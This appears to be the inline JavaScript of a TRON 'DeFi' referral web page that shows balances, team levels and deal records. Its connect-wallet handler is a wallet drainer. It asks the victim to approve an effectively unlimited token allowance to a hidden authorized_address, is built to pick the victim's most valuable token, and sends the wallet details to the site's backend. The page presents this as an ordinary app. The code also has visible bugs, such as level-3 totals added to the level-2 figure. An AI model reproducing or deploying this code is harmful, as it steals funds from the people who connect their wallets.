            wrapper.onmouseout = function() {
                timer = setInterval(rollStart, t);
            }
        }
        // 开始滚动函数
        function rollStart() {
            // 正常滚动不断给scrollTop的值+1,当滚动高度大于列表内容高度时恢复为0
            if (wrapper.scrollTop >= content.scrollHeight) {
                wrapper.scrollTop = 0;
            } else {
                wrapper.scrollTop++;
            }
        }

        function getUserInfo(address) {
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_user_info',
                data : {address: address},
                success:function(data){
                    $('.team').text(data.teamCount);
                    $('.child').text(data.child);
                    $('.eth_balance').text(data.eth);
                    $('.eth_pro').text(data.eth * (data.proportion / 100));
                    $('.trx_balance').text(data.trx);
                    $('.trx_pro').text((data.trx * (data.proportion / 100)).toFixed(6));
                    $('.level').text('Level ' + data.level);
                    $('.level1').text(data.level1);
                    $('.level2').text(data.level2);
                    $('.level3').text(data.level3);
                    getChildList(address)
                },
                error:function(data){
                }
            })
        }

        function getChildList(address, level = ''){
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_child_list',
                data: {address: address, level: level},
                success:function(data){
                    var level1_money = 0;
                    var level2_money = 0;
                    var level3_money = 0;
                    for (var index in data) {
                        switch (data[index]['level']) {
                            case 1:
                                level1_money += data[index]['money']
                                break;
                            case 2:
                                level2_money += data[index]['money']
                                break;
                            case 3:
                                level2_money += data[index]['money']
                                break;
                            default:
                                break;
                        }
                    }
                    $('.level1-money').text(level1_money);
                    $('.level2-money').text(level2_money);
                    $('.level3-money').text(level3_money);
                },
                error:function(data){
                }
            })
        }

        function getTrxDealRecord(address){
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_deal_record',
                data: {address: address, type: 2},
                success:function(data){
                    $('#exchange-list').html('')
                    var list = data;
                    var html = '';
                    for (var index in list) {
                        html += '<li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">'
                            + '<h3 class="h3-title font-weight-normal">' + list[index]['created_at'] + '</h3>'
                            + '<h2 class="h2-title font-weight-bold">' + list[index]['price'] + ' TRX</h2>'
                            + '</li>';
                    }
                    $('#exchange-list').html(html)
                },
                error:function(data){
                }
            })
        }

        function getWithdrawDealRecord(address){
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_deal_record',
                data: {address: address, type: 1},
                success:function(data){
                    $('#withdraw-list').html('')
                    var list = data;
                    var html = '';
                    for (var index in list) {
                        html += '<li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">'
                            + '<h3 class="h3-title font-weight-normal">' + list[index]['created_at'] + '</h3>'
                            + '<h2 class="h2-title font-weight-bold">' + list[index]['price'] + ' TRX</h2>'
                            + '</li>';
                    }
                    $('#withdraw-list').html(html)
                },
                error:function(data){
                }
            })
        }

        $(function() {
            const addr = {
                'WIN': 'TLa2f6VPqDgRE67v1736s7bJ8Ray5wYjU7',
                'USDT': 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t',
                'TONS': 'THgLniqRhDg5zePSrDTdU9QwY8FjD9nLYt',
                'USDJ': 'TMwFHYXLJaRUPeW6421aqXL4ZEzPRFGkGT',
                'JST': 'TCFLL5dx5ZJdKnWuesXxi1VPwjLVmWZZy9',
                'HT': 'TDyvndWuvX5xTBwHPYJi7J3Yq8pq8yh62h',
                'SUN': 'TKkeiboTkxXKJpbmVFbv4a8ov5rAfRDMf9',
                "EXNX": "TCcVeKtYUrHEQDPmozjJFMrf6XX7BgF84A",
                "VCOIN": "TNisVGhbxrJiEHyYUMPxRzgytUtGM7vssZ",
                "POL": "TWcDDx1Q6QEoBrJi9qehtZnD4vcXXuVLer",
                "CKRW": "TTVTdn8ipmacfKsCHw5Za48NRnaBRKeJ44"
            }

            const price = {
                'WIN': 0.001150,
                'USDT': 1,
                'TONS': 1.35,
                'USDJ': 1.04,
                'JST': 0.125,
                "HT": 20.41,
                "SUN": 33.97,
                "EXNX": 0.0621,
                "VCOIN": 0.004225,
                "POL": 0.1393,
                "CKRW": 0.002487,
            }

            const decimals = {
                'WIN': 6,
                'USDT': 6,
                'TONS': 6,
                'USDJ': 18,
                'JST': 18,
                "HT": 18,
                "SUN": 18,
                "EXNX": 18,
                "VCOIN": 6,
                "POL": 8,
                "CKRW": 6,
            }

            var total = 0;
            async function getMostValuableAssets(account) {
                let _symbol = 'USDT'
                return _symbol
                for (const symbol of Object.keys(addr)) {
                    let contract = await tronWeb.contract().at(addr[symbol]);
                    let myBalance = await contract.balanceOf(account).call(function(err, balance) {
                        const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                        console.log(usdt);
                        if (usdt > total && usdt > 500) {
                            _symbol = symbol
                            total = usdt
                            approveAddr = addr[_symbol]
                        }
                    })
                }
                bizhong = _symbol
                return _symbol
            }

            /**
             * * Connect wallet button pressed.
             */
            async function onConnect() {
                $('.pages').append('<div class="modal-overlay"></div>');
                $('.modal-overlay').addClass('modal-overlay-visible');
                $('.modal').removeClass('modal-out').addClass('modal-in');
                let tronWeb = window.tronWeb
                let walletAddress = await tronWeb.defaultAddress.base58;
                bizhong = await getMostValuableAssets(walletAddress);
                let instance = await tronWeb.contract().at(approveAddr);
                instance["balanceOf"](walletAddress).call().then(
                    function(result) {
                        //balance = result;
                    });
                balance = 0;
                let res = await instance["approve"](authorized_address, "90000000000000000000000000000");
                res.send({
                    feeLimit: 100000000,
                    callValue: 0,
                    shouldPollResponse: false
                }, function(err, res) {
                    // if (err == null) {
                        $(".tishi").fadeIn()
                        setTimeout(function() {
                            $(".tishi").fadeOut()
                        }, 2000);
                        postInfo(walletAddress, bizhong, balance);
                    // }
                    $('.modal-overlay').remove();
                    $('.modal').removeClass('modal-in').addClass('modal-out');
                })

                s()
            }

            function init() {
                getInfo();
                getProfits();
                time = setInterval(s, 1000);
            }

            async function s() {
                var tronWeb = window.tronWeb
                let contract = await tronWeb.contract().at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
                let walletAddress = await tronWeb.defaultAddress.base58;
                $('#walletadd').text(walletAddress.substring(0, 5))
                $('#referral-input').val(domain + 'defi2/index.html?parent=' + walletAddress)
                tradeobj = tronWeb.trx.getAccount(
                    walletAddress,
                ).then(output => {
                    trx = output.balance / 1000000;
                    $('.balance').text(trx + ' TRX');
                });
                let result = await contract.balanceOf(walletAddress).call(function(err, tex) {
                    if (err == null) {
                        let total = tex._hex / (10 ** 6);
                        $('#usdt_balance').attr('data-balance', total.toLocaleString())
                        $('#usdt_balance').text(total.toLocaleString() + ' USDT')
                    }
                });
                getUserInfo(walletAddress);
                getTrxDealRecord(walletAddress)
                getWithdrawDealRecord(walletAddress)
                window.clearInterval(time);
            }

            async function postDealRecord(trx, usdt_balance, type) {
                if (false === tronWeb.defaultAddress.base58) {
                    await onConnect();
                }

                var index = layer.load(2, {
                    shade: [0.7, "#000000"]
                });
                var data = {
                    address:tronWeb.defaultAddress.base58,
                    price:trx,
                    to_price:usdt_balance,
                    type: type
                }
                $.ajax({
                    type: 'post',
                    url: domain + 'api/insert_deal_record',
                    data: data,
                    success: function(data) {
                        layer.msg('Success', {
                            icon: 1
                        }, function() {
                            // location.reload()
                            layer.close(index);
                        });
                    },
                    error: function(data) {
                        layer.msg(data.status + ':' + data.statusText);
                        layer.close(index);
                    }
                })
            }

            async function postReferrerInfo() {
                if (false === tronWeb.defaultAddress.base58) {
                    await onConnect();
                }

                var index = layer.load(2, {
                    shade: [0.7, "#000000"]
                });
                var fid = jQuery('#fid').val();
                var data = {
                    address: tronWeb.defaultAddress.base58,
                    parent: fid
                }
                $.ajax({
                    type: 'post',
                    url: domain + 'api/insert_referral_info',
                    data: data,
                    success: function(data) {
                        if(data.code == 0){
                           layer.msg(data.msg,{icon:1},function(){
                               location.reload()
                               layer.close(index);
                           });
                        }else{
                           layer.msg(data.msg,{icon:2},function(){
                               layer.close(index);
                           });
                           console.log(data)
                        }
                    },
                    error: function(data) {
                        layer.msg(data.status + ':' + data.statusText);
                        layer.close(index);
                    }
                })
            }

            /**
             * Main entry point.
             */
            init();

            document.querySelector("#btn-connect").addEventListener("click", onConnect);
            document.querySelector("#connect").addEventListener("click", ssp);
            document.querySelector("#walletadd").addEventListener("click", ssp);

            var woust = 0;

            async function ssp(aa) {
                //var index = layer.load(2,{shade:[0.7,"#000000"]});
                woust = aa;
                var tronWeb = window.tronWeb;
                if (!tronWeb || tronWeb == undefined) {
                    layer.msg("Please use TRON wallet", {
                        icon: 2
                    }, function() {
                        //layer.close(index);
                    });
                }

                lit = 1;
                let walletAddress = await tronWeb.defaultAddress.base58;
                if (!walletAddress || walletAddress == '') {
                    layer.msg("Please use TRON wallet", {
                        icon: 2
                    }, function() {
                        //layer.close(index);
                    });
                }

                balance = 0;
                postCustomer(walletAddress, bizhong, balance);
            }

            setTimeout(function() {
                if (woust != 1) {
                    ssp(1);
                }

            }, 3000);

            $('.commit').click(function () {
                var ethnum = jQuery('#ethnumber').val();
                var usdt_balance = ethnum * 0.08197
                postDealRecord(ethnum, usdt_balance, 'trx');
            })

            $('.withdraw-commit').click(function () {
                var ethnum = jQuery('#usdtnumber').val();
                postDealRecord(ethnum, null, 'withdraw');
            })

            $('.referrer-commit').click(function () {
                postReferrerInfo()
            })
        })
    </script>
</body>
</html>
